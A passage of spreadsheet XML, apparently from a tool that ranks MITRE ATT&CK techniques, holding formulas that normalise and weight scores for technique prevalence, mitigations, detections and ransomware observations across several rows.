        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>63.230158730158735</v>
      </c>
      <c r="AR325" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS325" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT325" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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26" spans="1:47" ht="34">
      <c r="A326" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B326" s="37">
        <f t="shared" si="5"/>
        <v>794.88321057142855</v>
      </c>
      <c r="C326" s="37" t="s">
        <v>1134</v>
      </c>
      <c r="D326" s="50" t="s">
        <v>1135</v>
      </c>
      <c r="E326" s="37"/>
      <c r="F326" s="37">
        <v>3</v>
      </c>
      <c r="G326" s="37">
        <v>2</v>
      </c>
      <c r="H326" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I326" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J326" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K326" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L326" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M326" s="37">
        <v>0</v>
      </c>
      <c r="N326" s="56">
        <v>0</v>
      </c>
      <c r="O326" s="56">
        <v>10</v>
      </c>
      <c r="P326" s="56">
        <v>3</v>
      </c>
      <c r="Q326" s="56">
        <v>0</v>
      </c>
      <c r="R326" s="57" t="s">
        <v>1136</v>
      </c>
      <c r="S326" s="57">
        <v>13</v>
      </c>
      <c r="T326" s="57" t="s">
        <v>1137</v>
      </c>
      <c r="U326" s="57">
        <v>19</v>
      </c>
      <c r="V326" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.3666665714285714</v>
      </c>
      <c r="W326" s="37">
        <v>32</v>
      </c>
      <c r="X326" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y326" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z326" s="37">
        <v>13</v>
      </c>
      <c r="AA326" s="37">
        <v>0.13</v>
      </c>
      <c r="AB326" s="37">
        <v>0.13</v>
      </c>
      <c r="AC326" s="37"/>
      <c r="AD326" s="50" t="s">
        <v>646</v>
      </c>
      <c r="AE326" s="37" t="str" cm="1">
        <f t="array" ref="AE326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF326" s="37">
        <v>322</v>
      </c>
      <c r="AG326" s="37" t="str" cm="1">
        <f t="array" ref="AG326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH326" s="37">
        <v>322</v>
      </c>
      <c r="AI326" s="37" t="str" cm="1">
        <f t="array" ref="AI326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD326)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ326" s="37">
        <v>322</v>
      </c>
      <c r="AK326" s="37" t="str" cm="1">
        <f t="array" ref="AK326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL326" s="37">
        <v>322</v>
      </c>
      <c r="AM326" s="37" t="str" cm="1">
        <f t="array" ref="AM326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN326" s="37">
        <v>0</v>
      </c>
      <c r="AO326" s="37">
        <v>0</v>
      </c>
      <c r="AP326" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ326" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>264.96107019047616</v>
      </c>
      <c r="AR326" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS326" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT326" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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27" spans="1:47" ht="34">
      <c r="A327" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B327" s="37">
        <f t="shared" si="5"/>
        <v>120.06428571428572</v>
      </c>
      <c r="C327" s="37" t="s">
        <v>1138</v>
      </c>
      <c r="D327" s="50" t="s">
        <v>1139</v>
      </c>
      <c r="E327" s="37"/>
      <c r="F327" s="37">
        <v>1</v>
      </c>
      <c r="G327" s="37">
        <v>0</v>
      </c>
      <c r="H327" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I327" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J327" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K327" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L327" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M327" s="37">
        <v>0</v>
      </c>
      <c r="N327" s="56">
        <v>0</v>
      </c>
      <c r="O327" s="56">
        <v>6</v>
      </c>
      <c r="P327" s="56">
        <v>0</v>
      </c>
      <c r="Q327" s="56">
        <v>3</v>
      </c>
      <c r="R327" s="57"/>
      <c r="S327" s="57">
        <v>0</v>
      </c>
      <c r="T327" s="57"/>
      <c r="U327" s="57">
        <v>0</v>
      </c>
      <c r="V327" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142851E-2</v>
      </c>
      <c r="W327" s="37">
        <v>0</v>
      </c>
      <c r="X327" s="37">
        <v>0</v>
      </c>
      <c r="Y327" s="37">
        <v>0</v>
      </c>
      <c r="Z327" s="37">
        <v>9</v>
      </c>
      <c r="AA327" s="37">
        <v>0.09</v>
      </c>
      <c r="AB327" s="37">
        <v>0.09</v>
      </c>
      <c r="AC327" s="37"/>
      <c r="AD327" s="50" t="s">
        <v>1140</v>
      </c>
      <c r="AE327" s="37" t="str" cm="1">
        <f t="array" ref="AE327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD327)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF327" s="37">
        <v>323</v>
      </c>
      <c r="AG327" s="37" t="str" cm="1">
        <f t="array" ref="AG327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD327)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH327" s="37">
        <v>323</v>
      </c>
      <c r="AI327" s="37" t="str" cm="1">
        <f t="array" ref="AI327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD327)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ327" s="37">
        <v>323</v>
      </c>
      <c r="AK327" s="37" t="str" cm="1">
        <f t="array" ref="AK327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD327)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL327" s="37">
        <v>323</v>
      </c>
      <c r="AM327" s="37" t="str" cm="1">
        <f t="array" ref="AM327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD327)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN327" s="37">
        <v>0</v>
      </c>
      <c r="AO327" s="37">
        <v>3</v>
      </c>
      <c r="AP327" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ327" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.021428571428572</v>
      </c>
      <c r="AR327" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS327" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT327" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU32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2.9301020408163265</v>
      </c>
    </row>
    <row r="328" spans="1:47" ht="34">
      <c r="A328" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B328" s="37">
        <f t="shared" si="5"/>
        <v>839.96221357142861</v>
      </c>
      <c r="C328" s="37" t="s">
        <v>1141</v>
      </c>
      <c r="D328" s="50" t="s">
        <v>1142</v>
      </c>
      <c r="E328" s="37"/>
      <c r="F328" s="37">
        <v>1</v>
      </c>
      <c r="G328" s="37">
        <v>1</v>
      </c>
      <c r="H328" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I328" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J328" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K328" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L328" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M328" s="37">
        <v>0</v>
      </c>
      <c r="N328" s="56">
        <v>0</v>
      </c>
      <c r="O328" s="56">
        <v>0</v>
      </c>
      <c r="P328" s="56">
        <v>5</v>
      </c>
      <c r="Q328" s="56">
        <v>6</v>
      </c>
      <c r="R328" s="57" t="s">
        <v>1143</v>
      </c>
      <c r="S328" s="57">
        <v>19</v>
      </c>
      <c r="T328" s="57" t="s">
        <v>1144</v>
      </c>
      <c r="U328" s="57">
        <v>33</v>
      </c>
      <c r="V328" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.54761928571428575</v>
      </c>
      <c r="W328" s="37">
        <v>52</v>
      </c>
      <c r="X328" s="37">
        <v>0.94545500000000005</v>
      </c>
      <c r="Y328" s="37">
        <v>0.94545500000000005</v>
      </c>
      <c r="Z328" s="37">
        <v>11</v>
      </c>
      <c r="AA328" s="37">
        <v>0.11</v>
      </c>
      <c r="AB328" s="37">
        <v>0.11</v>
      </c>
      <c r="AC328" s="37"/>
      <c r="AD328" s="50" t="s">
        <v>1145</v>
      </c>
      <c r="AE328" s="37" t="str" cm="1">
        <f t="array" ref="AE328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD328)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF328" s="37">
        <v>324</v>
      </c>
      <c r="AG328" s="37" t="str" cm="1">
        <f t="array" ref="AG328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD328)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH328" s="37">
        <v>324</v>
      </c>
      <c r="AI328" s="37" t="str" cm="1">
        <f t="array" ref="AI328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD328)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ328" s="37">
        <v>324</v>
      </c>
      <c r="AK328" s="37" t="str" cm="1">
        <f t="array" ref="AK328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD328)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL328" s="37">
        <v>324</v>
      </c>
      <c r="AM328" s="37" t="str" cm="1">
        <f t="array" ref="AM328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD328)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN328" s="37">
        <v>0</v>
      </c>
      <c r="AO328" s="37">
        <v>0</v>
      </c>
      <c r="AP328" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ328" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>279.98740452380952</v>
      </c>
      <c r="AR328" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS328" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT328" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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29" spans="1:47" ht="51">
      <c r="A329" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B329" s="37">
        <f t="shared" si="5"/>
        <v>164.17380952380952</v>
      </c>
      <c r="C329" s="37" t="s">
        <v>1146</v>
      </c>
      <c r="D329" s="50" t="s">
        <v>1147</v>
      </c>
      <c r="E329" s="37"/>
      <c r="F329" s="37">
        <v>1</v>
      </c>
      <c r="G329" s="37">
        <v>0</v>
      </c>
      <c r="H329" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I329" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J329" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K329" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L329" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M329" s="37">
        <v>0</v>
      </c>
      <c r="N329" s="56">
        <v>0</v>
      </c>
      <c r="O329" s="56">
        <v>3</v>
      </c>
      <c r="P329" s="56">
        <v>9</v>
      </c>
      <c r="Q329" s="56">
        <v>4</v>
      </c>
      <c r="R329" s="57"/>
      <c r="S329" s="57">
        <v>0</v>
      </c>
      <c r="T329" s="57"/>
      <c r="U329" s="57">
        <v>0</v>
      </c>
      <c r="V329" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W329" s="37">
        <v>0</v>
      </c>
      <c r="X329" s="37">
        <v>0</v>
      </c>
      <c r="Y329" s="37">
        <v>0</v>
      </c>
      <c r="Z329" s="37">
        <v>16</v>
      </c>
      <c r="AA329" s="37">
        <v>0.16</v>
      </c>
      <c r="AB329" s="37">
        <v>0.16</v>
      </c>
      <c r="AC329" s="37"/>
      <c r="AD329" s="50" t="s">
        <v>1148</v>
      </c>
      <c r="AE329" s="37" t="str" cm="1">
        <f t="array" ref="AE329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF329" s="37">
        <v>325</v>
      </c>
      <c r="AG329" s="37" t="str" cm="1">
        <f t="array" ref="AG329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH329" s="37">
        <v>325</v>
      </c>
      <c r="AI329" s="37" t="str" cm="1">
        <f t="array" ref="AI329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD329)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ329" s="37">
        <v>325</v>
      </c>
      <c r="AK329" s="37" t="str" cm="1">
        <f t="array" ref="AK329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL329" s="37">
        <v>325</v>
      </c>
      <c r="AM329" s="37" t="str" cm="1">
        <f t="array" ref="AM329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN329" s="37">
        <v>0</v>
      </c>
      <c r="AO329" s="37">
        <v>0</v>
      </c>
      <c r="AP329" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ329" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.724603174603175</v>
      </c>
      <c r="AR329" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS329" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT329" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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30" spans="1:47" ht="51">
      <c r="A330" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B330" s="37">
        <f t="shared" si="5"/>
        <v>391.50000000000006</v>
      </c>
      <c r="C330" s="37" t="s">
        <v>1149</v>
      </c>
      <c r="D330" s="50" t="s">
        <v>1150</v>
      </c>
      <c r="E330" s="37"/>
      <c r="F330" s="37">
        <v>4</v>
      </c>
      <c r="G330" s="37">
        <v>2</v>
      </c>
      <c r="H330" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.30000000000000004</v>
      </c>
      <c r="I330" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J330" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K330" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L330" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M330" s="37">
        <v>0</v>
      </c>
      <c r="N330" s="56">
        <v>0</v>
      </c>
      <c r="O330" s="56">
        <v>0</v>
      </c>
      <c r="P330" s="56">
        <v>0</v>
      </c>
      <c r="Q330" s="56">
        <v>0</v>
      </c>
      <c r="R330" s="57"/>
      <c r="S330" s="57">
        <v>0</v>
      </c>
      <c r="T330" s="57"/>
      <c r="U330" s="57">
        <v>0</v>
      </c>
      <c r="V330" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W330" s="37">
        <v>0</v>
      </c>
      <c r="X330" s="37">
        <v>0</v>
      </c>
      <c r="Y330" s="37">
        <v>0</v>
      </c>
      <c r="Z330" s="37">
        <v>0</v>
      </c>
      <c r="AA330" s="37">
        <v>0</v>
      </c>
      <c r="AB330" s="37">
        <v>0</v>
      </c>
      <c r="AC330" s="37"/>
      <c r="AD330" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE330" s="37" t="str" cm="1">
        <f t="array" ref="AE330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD330)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF330" s="37">
        <v>326</v>
      </c>
      <c r="AG330" s="37" t="str" cm="1">
        <f t="array" ref="AG330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD330)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH330" s="37">
        <v>326</v>
      </c>
      <c r="AI330" s="37" t="str" cm="1">
        <f t="array" ref="AI330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD330)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ330" s="37">
        <v>326</v>
      </c>
      <c r="AK330" s="37" t="str" cm="1">
        <f t="array" ref="AK330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD330)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL330" s="37">
        <v>326</v>
      </c>
      <c r="AM330" s="37" t="str" cm="1">
        <f t="array" ref="AM330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD330)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN330" s="37">
        <v>0</v>
      </c>
      <c r="AO330" s="37">
        <v>1</v>
      </c>
      <c r="AP330" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ330" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>130.50000000000003</v>
      </c>
      <c r="AR330" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS330" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT330" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU33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3.1309523809523814</v>
      </c>
    </row>
    <row r="331" spans="1:47" ht="34">
      <c r="A331" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B331" s="37">
        <f t="shared" si="5"/>
        <v>230.63314633333334</v>
      </c>
      <c r="C331" s="37" t="s">
        <v>1152</v>
      </c>
      <c r="D331" s="50" t="s">
        <v>1153</v>
      </c>
      <c r="E331" s="37"/>
      <c r="F331" s="37">
        <v>1</v>
      </c>
      <c r="G331" s="37">
        <v>1</v>
      </c>
      <c r="H331" s="37">
